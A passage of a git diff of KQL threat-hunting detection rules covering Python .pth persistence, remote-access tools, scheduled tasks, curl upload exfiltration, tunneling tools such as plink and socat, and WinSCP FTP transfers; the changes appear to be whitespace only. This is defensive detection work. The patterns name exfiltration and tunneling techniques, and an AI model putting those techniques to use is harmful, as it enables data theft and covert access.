these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. -// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.006, detection.threat-hunting -// False Positives: -// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. - -DeviceFileEvents +// Title: Python Path Configuration File Creation - MacOS +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-04-25 +// Level: medium +// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. +// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.threat-hunting +// False Positives: +// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. + +DeviceFileEvents | where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql index d8ddfda8..357653c8 100644 --- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql @@ -1,14 +1,14 @@ -// Title: Python Path Configuration File Creation - Windows -// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-04-25 -// Level: medium -// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. -// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. -// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.006, detection.threat-hunting -// False Positives: -// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. - -DeviceFileEvents +// Title: Python Path Configuration File Creation - Windows +// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-25 +// Level: medium +// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. +// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.threat-hunting +// False Positives: +// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. + +DeviceFileEvents | where (FolderPath endswith ".pth" and FolderPath matches regex "(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\") and (not((InitiatingProcessFolderPath endswith "\\python.exe" and (FolderPath endswith "\\pywin32.pth" or FolderPath endswith "\\distutils-precedence.pth")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql index 3fd52a07..33864ef7 100644 --- a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - Ammy Admin Agent Execution -// Author: @kostastsale -// Date: 2024-08-05 -// Level: medium -// Description: Detects the execution of the Ammy Admin RMM agent for remote management. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, detection.threat-hunting -// False Positives: -// - Legitimate use of Ammy Admin RMM agent for remote management by admins. - -DeviceProcessEvents +// Title: Remote Access Tool - Ammy Admin Agent Execution +// Author: @kostastsale +// Date: 2024-08-05 +// Level: medium +// Description: Detects the execution of the Ammy Admin RMM agent for remote management. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, detection.threat-hunting +// False Positives: +// - Legitimate use of Ammy Admin RMM agent for remote management by admins. + +DeviceProcessEvents | where ProcessCommandLine contains "AMMYY\\aa_nts.dll\",run" and FolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql index 30ba515f..e74fe141 100644 --- a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql @@ -1,12 +1,12 @@ -// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer -// Author: @kostastsale -// Date: 2024-08-03 -// Level: medium -// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, detection.threat-hunting -// False Positives: -// - Legitimate use for admin activity. - -DeviceProcessEvents +// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer +// Author: @kostastsale +// Date: 2024-08-03 +// Level: medium +// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, detection.threat-hunting +// False Positives: +// - Legitimate use for admin activity. + +DeviceProcessEvents | where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "AVCore.exe\" -d" and InitiatingProcessFolderPath endswith "\\AVCore.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql index 41a2ea1a..e692c9a3 100644 --- a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql @@ -1,13 +1,13 @@ -// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-02-23 -// Level: medium -// Description: Detects remote binary or command execution via the ScreenConnect Service. -// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect -// MITRE Tactic: Execution -// Tags: attack.execution, detection.threat-hunting -// False Positives: -// - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies. - -DeviceProcessEvents +// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: medium +// Description: Detects remote binary or command execution via the ScreenConnect Service. +// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql index 739ff4e0..6d47da3f 100644 --- a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql +++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql @@ -1,12 +1,12 @@ -// Title: Scheduled Task Created - FileCreation -// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team -// Date: 2023-09-27 -// Level: low -// Description: Detects the creation of a scheduled task via file creation. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting -// False Positives: -// - Normal behaviour on Windows - -DeviceFileEvents +// Title: Scheduled Task Created - FileCreation +// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team +// Date: 2023-09-27 +// Level: low +// Description: Detects the creation of a scheduled task via file creation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting +// False Positives: +// - Normal behaviour on Windows + +DeviceFileEvents | where FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\SysWOW64\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql index 8c575ce3..1eba0045 100644 --- a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql +++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql @@ -1,12 +1,12 @@ -// Title: Scheduled Task Created - Registry -// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team -// Date: 2023-09-27 -// Level: low -// Description: Detects the creation of a scheduled task via Registry keys. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting -// False Positives: -// - Likely as this is a normal behaviour on Windows - -DeviceRegistryEvents +// Title: Scheduled Task Created - Registry +// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team +// Date: 2023-09-27 +// Level: low +// Description: Detects the creation of a scheduled task via Registry keys. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting +// False Positives: +// - Likely as this is a normal behaviour on Windows + +DeviceRegistryEvents | where RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks*" or RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql index 13e8da72..c1b8a721 100644 --- a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql +++ b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql @@ -1,13 +1,13 @@ -// Title: Scheduled Task Creation From Potential Suspicious Parent Location -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-23 -// Level: medium -// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. -// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting -// False Positives: -// - Software installers that run from temporary folders and also install scheduled tasks - -DeviceProcessEvents +// Title: Scheduled Task Creation From Potential Suspicious Parent Location +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-23 +// Level: medium +// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. +// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting +// False Positives: +// - Software installers that run from temporary folders and also install scheduled tasks + +DeviceProcessEvents | where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\AppData\\Roaming\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "unattended.ini"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql index 86e6b006..bb118400 100644 --- a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql +++ b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql @@ -1,13 +1,13 @@ -// Title: Suspicious New Instance Of An Office COM Object -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-13 -// Level: medium -// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. -// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting -// False Positives: -// - Legitimate usage of office automation via scripting - -DeviceProcessEvents +// Title: Suspicious New Instance Of An Office COM Object +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-13 +// Level: medium +// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. +// This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Legitimate usage of office automation via scripting + +DeviceProcessEvents | where (FolderPath endswith "\\eqnedt32.exe" or FolderPath endswith "\\excel.exe" or FolderPath endswith "\\msaccess.exe" or FolderPath endswith "\\mspub.exe" or FolderPath endswith "\\powerpnt.exe" or FolderPath endswith "\\visio.exe" or FolderPath endswith "\\winword.exe") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql index 3f7f2608..a945269d 100644 --- a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql +++ b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql @@ -1,10 +1,10 @@ -// Title: Unusually Long PowerShell CommandLine -// Author: oscd.community, Natalia Shornikova -// Date: 2020-10-06 -// Level: low -// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.threat-hunting - -DeviceProcessEvents +// Title: Unusually Long PowerShell CommandLine +// Author: oscd.community, Natalia Shornikova +// Date: 2020-10-06 +// Level: low +// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting + +DeviceProcessEvents | where ProcessCommandLine matches regex ".{1000,}" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows Powershell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql index d2bb54ce..744926a2 100644 --- a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql +++ b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql @@ -1,10 +1,10 @@ -// Title: WMI Module Loaded By Uncommon Process -// Author: Roberto Rodriguez @Cyb3rWard0g -// Date: 2019-08-10 -// Level: low -// Description: Detects WMI modules being loaded by an uncommon process -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, detection.threat-hunting - -DeviceImageLoadEvents +// Title: WMI Module Loaded By Uncommon Process +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-10 +// Level: low +// Description: Detects WMI modules being loaded by an uncommon process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, detection.threat-hunting + +DeviceImageLoadEvents | where (FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\WmiApRpl.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\WMINet_Utils.dll" or FolderPath endswith "\\wmiprov.dll" or FolderPath endswith "\\wmiutils.dll") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or (InitiatingProcessFolderPath endswith "\\WindowsAzureGuestAgent.exe" or InitiatingProcessFolderPath endswith "\\WaAppAgent.exe") or (InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\Update.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql index 675bc7a4..2adf8368 100644 --- a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql +++ b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql @@ -1,12 +1,12 @@ -// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript -// Author: Michael Haag -// Date: 2019-01-16 -// Level: medium -// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting -// False Positives: -// - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy. - -DeviceProcessEvents +// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript +// Author: Michael Haag +// Date: 2019-01-16 +// Level: medium +// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting +// False Positives: +// - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy. + +DeviceProcessEvents | where (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql index be2a82f7..241dcbd5 100644 --- a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql +++ b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql @@ -1,10 +1,10 @@ -// Title: FTP Connection Open Attempt Via Winscp CLI -// Author: frack113 -// Date: 2025-10-12 -// Level: medium -// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting - -DeviceProcessEvents +// Title: FTP Connection Open Attempt Via Winscp CLI +// Author: frack113 +// Date: 2025-10-12 +// Level: medium +// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting + +DeviceProcessEvents | where ((ProcessCommandLine contains "open " and ProcessCommandLine contains "ftp://") and (ProcessCommandLine contains "-command" or ProcessCommandLine contains "/command" or ProcessCommandLine contains "–command" or ProcessCommandLine contains "—command" or ProcessCommandLine contains "―command")) and (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql index 4202f810..817fd51c 100644 --- a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql +++ b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Data Exfiltration Via Curl.EXE -// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update) -// Date: 2020-07-03 -// Level: medium -// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting -// False Positives: -// - Scripts created by developers and admins - -DeviceProcessEvents +// Title: Potential Data Exfiltration Via Curl.EXE +// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update) +// Date: 2020-07-03 +// Level: medium +// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins + +DeviceProcessEvents | where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable")) and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql index 53f32716..f6c41498 100644 --- a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql +++ b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql @@ -1,12 +1,12 @@ -// Title: Tunneling Tool Execution -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2019-10-24 -// Level: medium -// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, detection.threat-hunting -// False Positives: -// - Legitimate administrators using one of these tools - -DeviceProcessEvents +// Title: Tunneling Tool Execution +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, detection.threat-hunting +// False Positives: +// - Legitimate administrators using one of these tools + +DeviceProcessEvents | where FolderPath endswith "\\httptunnel.exe" or FolderPath endswith "\\plink.exe" or FolderPath endswith "\\socat.exe" or FolderPath endswith "\\stunnel.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql index a71b0772..2ceacb0f 100644 --- a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql +++ b/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql @@ -1,10 +1,10 @@ -// Title: Winscp Execution From Non Standard Folder -// Author: frack113 -// Date: 2025-10-12 -// Level: medium -// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting - -DeviceProcessEvents +// Title: Winscp Execution From Non Standard Folder +// Author: frack113 +// Date: 2025-10-12 +// Level: medium +// Description: Detects the execution of Winscp from an a non standard folder. This could indicate the execution of Winscp portable. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting + +DeviceProcessEvents | where (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") and (not(FolderPath startswith "C:\\Program Files (x86)\\WinSCP\\")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql index 3839d209..57e847f0 100644 --- a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql +++ b/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql @@ -1,13 +1,13 @@ -// Title: Process Terminated Via Taskkill -// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali -// Date: 2021-12-26 -// Level: low -// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. -// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1489, detection.threat-hunting -// False Positives: -// - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates - -DeviceProcessEvents +// Title: Process Terminated Via Taskkill +// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali +// Date: 2021-12-26 +// Level: low +// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity. +// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489, detection.threat-hunting +// False Positives: +// - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates + +DeviceProcessEvents | where ((ProcessCommandLine contains " -im " or ProcessCommandLine contains " /im " or ProcessCommandLine contains " –im " or ProcessCommandLine contains " —im " or ProcessCommandLine contains " ―im " or ProcessCommandLine contains " -pid " or ProcessCommandLine contains " /pid " or ProcessCommandLine contains " –pid " or ProcessCommandLine contains " —pid " or ProcessCommandLine contains " ―pid ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " /f" or ProcessCommandLine endswith " –f" or ProcessCommandLine endswith " —f" or ProcessCommandLine endswith " ―f") and (FolderPath endswith "\\taskkill.exe" or ProcessVersionInfoOriginalFileName =~ "taskkill.exe")) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp") and InitiatingProcessFolderPath endswith ".tmp"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql index 95fb738b..d50ad721 100644 --- a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql +++ b/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql @@ -1,12 +1,12 @@ -// Title: WebDAV Temporary Local File Creation -// Author: Micah Babinski -// Date: 2023-08-21 -// Level: medium -// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting -// False Positives: -// - Legitimate use of WebDAV in an environment - -DeviceFileEvents +// Title: WebDAV Temporary Local File Creation +// Author: Micah Babinski +// Date: 2023-08-21 +// Level: medium +// Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.resource-development, attack.t1584, attack.t1566, detection.threat-hunting +// False Positives: +// - Legitimate use of WebDAV in an environment + +DeviceFileEvents | where FolderPath contains "\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\\" and (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".dat" or FolderPath endswith ".ico" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".rar" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql index 61ecdb7a..b3f171fb 100644 --- a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql +++ b/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: SMB over QUIC Via Net.EXE 